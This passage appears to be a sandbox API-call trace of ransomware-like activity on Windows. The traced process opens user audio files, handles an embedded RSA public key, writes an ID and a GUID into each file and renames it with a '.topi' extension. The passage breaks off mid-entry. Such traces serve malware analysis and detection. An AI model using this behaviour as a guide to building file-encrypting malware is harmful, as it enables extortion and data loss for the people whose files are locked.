[0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ef8 | out: hHeap=0x680000) returned 1 [0097.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f28 | out: hHeap=0x680000) returned 1 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f10 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ee0 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ec8 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb770 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.624] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x697d, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x697d, lpOverlapped=0x0) returned 1 [0097.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.624] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6982, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.624] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.625] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.625] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.625] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.625] CloseHandle (hObject=0x6a8) returned 1 [0097.632] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ed08 [0097.632] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c0) returned 0x31cf750 [0097.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ed08 | out: hHeap=0x680000) returned 1 [0097.633] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\7akSZQOCvEwD.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\prubswuwcdllwicr\\7akszqocvewd.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\7akSZQOCvEwD.m4a.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\prubswuwcdllwicr\\7akszqocvewd.m4a.topi")) returned 1 [0097.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.633] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0097.635] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f1993f0, ftCreationTime.dwHighDateTime=0x1d5c05a, ftLastAccessTime.dwLowDateTime=0x7155bf30, ftLastAccessTime.dwHighDateTime=0x1d5bfad, ftLastWriteTime.dwLowDateTime=0x7155bf30, ftLastWriteTime.dwHighDateTime=0x1d5bfad, nFileSizeHigh=0x0, nFileSizeLow=0x511c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vCdGmDM5J3F.m4a", cAlternateFileName="VCDGMD~1.M4A")) returned 1 [0097.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b45e8 [0097.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd6) returned 0x766b58 [0097.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b45e8 | out: hHeap=0x680000) returned 1 [0097.635] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\vCdGmDM5J3F.m4a") returned=".m4a" [0097.635] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\vCdGmDM5J3F.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\prubswuwcdllwicr\\vcdgmdm5j3f.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.635] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=20764) returned 1 [0097.635] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.638] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x50f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.638] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.639] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.639] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x511c, lpOverlapped=0x0) returned 1 [0097.639] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.639] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.639] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.639] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.640] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.640] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.640] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.640] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.640] GetLastError () returned 0x0 [0097.640] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.640] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.640] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.640] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.640] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5120) returned 0x99fc2d8 [0097.641] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb770 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ec8 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb7b8 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ee0 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f10 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f28 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.641] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f10 | out: hHeap=0x680000) returned 1 [0097.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f28 | out: hHeap=0x680000) returned 1 [0097.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4f28 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4f10 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f28 | out: hHeap=0x680000) returned 1 [0097.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f10 | out: hHeap=0x680000) returned 1 [0097.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.642] GetCurrentThreadId () returned 0x8c4 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9ec0 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.642] GetCurrentThreadId () returned 0x8c4 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f10 [0097.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f28 [0097.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ef8 [0097.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4f40 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.644] HeapFree (in: 